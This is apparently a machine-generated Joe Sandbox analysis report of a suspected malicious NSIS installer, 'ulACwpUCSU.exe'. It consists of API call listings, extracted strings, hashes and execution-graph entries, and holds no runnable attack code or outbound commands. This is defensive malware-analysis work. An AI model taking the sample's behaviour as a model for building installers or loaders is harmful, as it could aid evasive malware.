                                            • Part of subcall function 0040501F: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00402C51,00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00000000,00000000), ref: 0040507B
                                            • Part of subcall function 0040501F: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll), ref: 0040508D
                                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050B3
                                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050CD
                                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050DB
                                          • CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C62
                                          • ShowWindow.USER32(00000000,00000005), ref: 00402C70
                                            • Part of subcall function 00402BBE: MulDiv.KERNEL32(00000000,00000064,00000B8A), ref: 00402BD3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                          • String ID: ... %d%%
                                          • API String ID: 722711167-2449383134
                                          APIs
                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404905
                                          • GetMessagePos.USER32 ref: 0040490D
                                          • ScreenToClient.USER32(?,?), ref: 00404927
                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404939
                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040495F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Message$Send$ClientScreen
                                          • String ID: f
                                          • API String ID: 41195575-1993550816
                                          APIs
                                          • GetDC.USER32(?), ref: 00401D29
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                          • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                          • CreateFontIndirectA.GDI32(0040A7D0), ref: 00401DA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                          • String ID: Times New Roman
                                          • API String ID: 3808545654-927190056
                                          APIs
                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B5D
                                          • wsprintfA.USER32 ref: 00402B91
                                          • SetWindowTextA.USER32(?,?), ref: 00402BA1
                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Text$ItemTimerWindowwsprintf
                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                          • API String ID: 1451636040-1158693248
                                          APIs
                                          • lstrlenA.KERNEL32(Supersuspicion Setup: Installing,Supersuspicion Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046FB,000000DF,00000000,00000400,?), ref: 0040487E
                                          • wsprintfA.USER32 ref: 00404886
                                          • SetDlgItemTextA.USER32(?,Supersuspicion Setup: Installing), ref: 00404899
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: ItemTextlstrlenwsprintf
                                          • String ID: %u.%u%s%s$Supersuspicion Setup: Installing
                                          • API String ID: 3540041739-662044061
                                          APIs
                                          • GetDlgItem.USER32 ref: 00401CD0
                                          • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                          • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                          • DeleteObject.GDI32(00000000), ref: 00401D1B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                          • String ID:
                                          • API String ID: 1849352358-0
                                          APIs
                                          • SetWindowTextA.USER32(00000000,00422F00), ref: 00403AE4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: TextWindow
                                          • String ID: "C:\Users\user\Desktop\ulACwpUCSU.exe"$1033$Supersuspicion Setup: Installing
                                          • API String ID: 530164218-929691339
                                          APIs
                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76CD3410,004033C9), ref: 004057CC
                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76CD3410,004033C9), ref: 004057D5
                                          • lstrcatA.KERNEL32(?,00409014), ref: 004057E6
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004057C6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: CharPrevlstrcatlstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 2659869361-787714339
                                          APIs
                                          • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                          • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                          • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                            • Part of subcall function 00405C94: wsprintfA.USER32 ref: 00405CA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                          • String ID:
                                          • API String ID: 1404258612-0
                                          • Opcode ID: ec7151e13ff031cd6146c14c1100c40685b360c9b493fb258c96d19e35a9089b
                                          • Instruction ID: 9791f4c70c1528f8983e13c97e2cb0ced061aec02aec85b9ff59acd402aedfa8
                                          • Opcode Fuzzy Hash: ec7151e13ff031cd6146c14c1100c40685b360c9b493fb258c96d19e35a9089b
                                          • Instruction Fuzzy Hash: A0117071901209BEDF01EFA5DD85DAEBBB9EF04344B20807AF505F61A1D7388E55DB28
                                          APIs
                                          • CharNextA.USER32(?,?,Invaliditetsprocent209\indoktrineringen.rec,?,004058CB,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,76CD2EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,76CD2EE0,00000000), ref: 0040586D
                                          • CharNextA.USER32(00000000), ref: 00405872
                                          • CharNextA.USER32(00000000), ref: 00405886
                                          Strings
                                          • Invaliditetsprocent209\indoktrineringen.rec, xrefs: 00405860
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CharNext
                                          • String ID: Invaliditetsprocent209\indoktrineringen.rec
                                          • API String ID: 3213498283-2173611331
                                          • Opcode ID: 2ea991d7d7ffd85479a521eab3fc1e567f9f9a9fdda000af801139d1d19966a1
                                          • Instruction ID: 725a23b4e930c3b6c27a7d0cd0e333612dd42f6c53d199a680129a9385ae8045
                                          • Opcode Fuzzy Hash: 2ea991d7d7ffd85479a521eab3fc1e567f9f9a9fdda000af801139d1d19966a1
                                          • Instruction Fuzzy Hash: 74F06253914F516AFB3276645C44B7B5A8CCF56361F188477EE40A62C2C2BC4C618F9A
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 00404FC2
                                          • CallWindowProcA.USER32(?,?,?,?), ref: 00405013
                                            • Part of subcall function 00404038: SendMessageA.USER32(000104AE,00000000,00000000,00000000), ref: 0040404A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Window$CallMessageProcSendVisible
                                          • String ID:
                                          • API String ID: 3748168415-3916222277
                                          • Opcode ID: a1366604d20516d7a227b416e124a8c8ccbf6a8c92e3cea699473ae65b9a4b61
                                          • Instruction ID: 01da3f5901ddaf9404fa7d81b8fd4ad62d8e53e58d7af57a61279808ed2d7cb1
                                          • Opcode Fuzzy Hash: a1366604d20516d7a227b416e124a8c8ccbf6a8c92e3cea699473ae65b9a4b61
                                          • Instruction Fuzzy Hash: EA018F7110020DABDF209F11DC85E9F3B6AF784758F208037FA04752D1D77A8C92AAAE
                                          APIs
                                            • Part of subcall function 00405D36: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405D43
                                            • Part of subcall function 0040585F: CharNextA.USER32(?,?,Invaliditetsprocent209\indoktrineringen.rec,?,004058CB,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,76CD2EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,76CD2EE0,00000000), ref: 0040586D
                                            • Part of subcall function 0040585F: CharNextA.USER32(00000000), ref: 00405872
                                            • Part of subcall function 0040585F: CharNextA.USER32(00000000), ref: 00405886
                                          • lstrlenA.KERNEL32(Invaliditetsprocent209\indoktrineringen.rec,00000000,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,76CD2EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,76CD2EE0,00000000), ref: 00405907
                                          • GetFileAttributesA.KERNEL32(Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,00000000,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,76CD2EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,76CD2EE0), ref: 00405917
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                          • String ID: Invaliditetsprocent209\indoktrineringen.rec
                                          • API String ID: 3248276644-2173611331
                                          • Opcode ID: 681a1499075d1ef18d3e94b36260b5cb5e6403957cf75bde6daaeed28ee23a5f
                                          • Instruction ID: cee4b60d78671bb78a10d3fddc0396ac835ea714c96625339261d657e7680c9f
                                          • Opcode Fuzzy Hash: 681a1499075d1ef18d3e94b36260b5cb5e6403957cf75bde6daaeed28ee23a5f
                                          • Instruction Fuzzy Hash: 0AF02823105D6026C63233391C09AAF1B95CE86368B24853FFC51B22D1DB3C8863DE7E
                                          APIs
                                          • lstrlenA.KERNEL32(00000000,00000011), ref: 004024EF
                                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 0040250E
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll, xrefs: 004024DD, 00402502
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FileWritelstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll
                                          • API String ID: 427699356-4140934786
                                          • Opcode ID: f7e9c7c3a0b030329b9eac82e2999ac8e5cd3652365a72a00433b5ad3c482558
                                          • Instruction ID: 4826b5ec7f58a8945af1d05ae4e09a11cd1e532a13e769836b40841c5f4177c7
                                          • Opcode Fuzzy Hash: f7e9c7c3a0b030329b9eac82e2999ac8e5cd3652365a72a00433b5ad3c482558
                                          • Instruction Fuzzy Hash: 80F054B2A54244BFDB40ABA19E499EB66A4DB40309F10443FB141F61C2D5BC4941A66A
                                          APIs
                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421500,Error launching installer), ref: 0040550E
                                          • CloseHandle.KERNEL32(?), ref: 0040551B
                                          Strings
                                          • Error launching installer, xrefs: 004054F8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CloseCreateHandleProcess
                                          • String ID: Error launching installer
                                          • API String ID: 3712363035-66219284
                                          • Opcode ID: a807c8c1498f9a3ccd34e9273e49e04dcb617f56f5cccdb726230c0895ca6d7f
                                          • Instruction ID: 0ae392a05d3974bec86de51aa2f8a5c28ff0ee3cdd976454f3eed0d5dd72dd2a
                                          • Opcode Fuzzy Hash: a807c8c1498f9a3ccd34e9273e49e04dcb617f56f5cccdb726230c0895ca6d7f
                                          • Instruction Fuzzy Hash: 2BE0BFB4A00209BFEB109FA4ED05F7B76ADEB14745F508561BD11F2160E774A9108A79
                                          APIs
                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76CD2EE0,004036C9,76CD3410,004034D6,?), ref: 0040370C
                                          • GlobalFree.KERNEL32(005DFE60), ref: 00403713
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403704
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Free$GlobalLibrary
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 1100898210-787714339
                                          • Opcode ID: 86ea4e8f2e330b4051334ac2fa91e3adcb647da4565bec0431381526e270e322
                                          • Instruction ID: 0fe4964e98027e88380181352afc78dea88c0f551701ba437740c6db36bc47f5
                                          • Opcode Fuzzy Hash: 86ea4e8f2e330b4051334ac2fa91e3adcb647da4565bec0431381526e270e322
                                          • Instruction Fuzzy Hash: 0EE0EC7390512097C6215F96AD04B5ABB686B89B62F06842AED407B3A18B746C418BD9
                                          APIs
                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ulACwpUCSU.exe,C:\Users\user\Desktop\ulACwpUCSU.exe,80000000,00000003), ref: 00405813
                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ulACwpUCSU.exe,C:\Users\user\Desktop\ulACwpUCSU.exe,80000000,00000003), ref: 00405821
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CharPrevlstrlen
                                          • String ID: C:\Users\user\Desktop
                                          • API String ID: 2709904686-3443045126
                                          • Opcode ID: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                          • Instruction ID: ba052d51ab232c33a65bcd29671eceb75c11827358d6bb1c4ef4a0a5cf44e1aa
                                          • Opcode Fuzzy Hash: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
                                          • Instruction Fuzzy Hash: 94D0A77341AD701EE30372109C04B8F6A48CF16300F098462E440B61A0C2780C414BED
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                          • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                          • GlobalFree.KERNEL32(?), ref: 100011C7
                                          • GlobalFree.KERNEL32(?), ref: 100011F5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2905161694.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                          Similarity
                                          • API ID: Global$Free$Alloc
                                          • String ID:
                                          • API String ID: 1780285237-0
                                          • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                          • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                          • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                          • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                          APIs
                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B5B,00000000,[Rename],00000000,00000000,00000000), ref: 0040593C
                                          • lstrcmpiA.KERNEL32(00405B5B,00000000), ref: 00405954
                                          • CharNextA.USER32(00405B5B,?,00000000,00405B5B,00000000,[Rename],00000000,00000000,00000000), ref: 00405965
                                          • lstrlenA.KERNEL32(00405B5B,?,00000000,00405B5B,00000000,[Rename],00000000,00000000,00000000), ref: 0040596E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: lstrlen$CharNextlstrcmpi
                                          • String ID:
                                          • API String ID: 190613189-0
                                          • Opcode ID: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                                          • Instruction ID: 6acf3bc3cda9f3bfd2525b0ac34aa546eab038af588102683640af0afc927a81
                                          • Opcode Fuzzy Hash: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                                          • Instruction Fuzzy Hash: 27F0C232604518FFC7129BA4DD40D9FBBA8EF06360B2500AAE800F7250D274EE019FAA

                                          Execution Graph

                                          Execution Coverage:0%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:100%
                                          Total number of Nodes:1
                                          Total number of Limit Nodes:0
                                          execution_graph 47836 37732b90 LdrInitializeThunk

                                          Control-flow Graph

                                          control_flow_graph 2 377334e0-377334ec LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1 37732d10-37732d1c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 37732b90-37732b9c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          Strings
                                          • Critical section debug info address, xrefs: 3776522A, 37765339
                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 377652ED
                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 37765215, 377652A1, 37765324
                                          • 8, xrefs: 377650EE
                                          • Critical section address., xrefs: 3776530D
                                          • Address of the debug info found in the active list., xrefs: 377652B9, 37765305
                                          • Thread identifier, xrefs: 37765345
                                          • Thread is in a state in which it cannot own a critical section, xrefs: 3776534E
                                          • double initialized or corrupted critical section, xrefs: 37765313
                                          • Invalid debug info address of this critical section, xrefs: 377652C1
                                          • corrupted critical section, xrefs: 377652CD
                                          • undeleted critical section in freed memory, xrefs: 37765236
                                          • Critical section address, xrefs: 37765230, 377652C7, 3776533F
                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 377652D9
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                          • API String ID: 0-2368682639

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                          • API String ID: 3446177414-1700792311

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.q7
                                          • API String ID: 0-3492232232

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                          • API String ID: 0-2515994595
                                          APIs
                                          • RtlDebugPrintTimes.NTDLL ref: 376E651C
                                            • Part of subcall function 376E6565: RtlDebugPrintTimes.NTDLL ref: 376E6614
                                            • Part of subcall function 376E6565: RtlDebugPrintTimes.NTDLL ref: 376E665F
                                          Strings
                                          • apphelp.dll, xrefs: 376E6446
                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 377497B9
                                          • minkernel\ntdll\ldrinit.c, xrefs: 377497A0, 377497C9
                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 37749790
                                          • LdrpInitShimEngine, xrefs: 37749783, 37749796, 377497BF
                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3774977C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-204845295
                                          APIs
                                          • RtlDebugPrintTimes.NTDLL ref: 3771D879
                                            • Part of subcall function 376F4779: RtlDebugPrintTimes.NTDLL ref: 376F4817
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-1975516107
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.3044601272.00000000376C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376C0000, based on PE: true
                                          • Associated: 00000003.00000002.3044601272.00000000377E9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.3044601272.00000000377ED000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_376c0000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                          • API String ID: 0-2224505338
                                          Strings
                                          • HandleTraces, xrefs: 3777890F
                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 377786E7
                                          • VerifierDlls, xrefs: 3777893D
                                          • AVRF: -*- final list of providers -*- , xrefs: 3777880F
                                          • VerifierFlags, xrefs: 377788D0
                                          • VerifierDebug, xrefs: 37778925
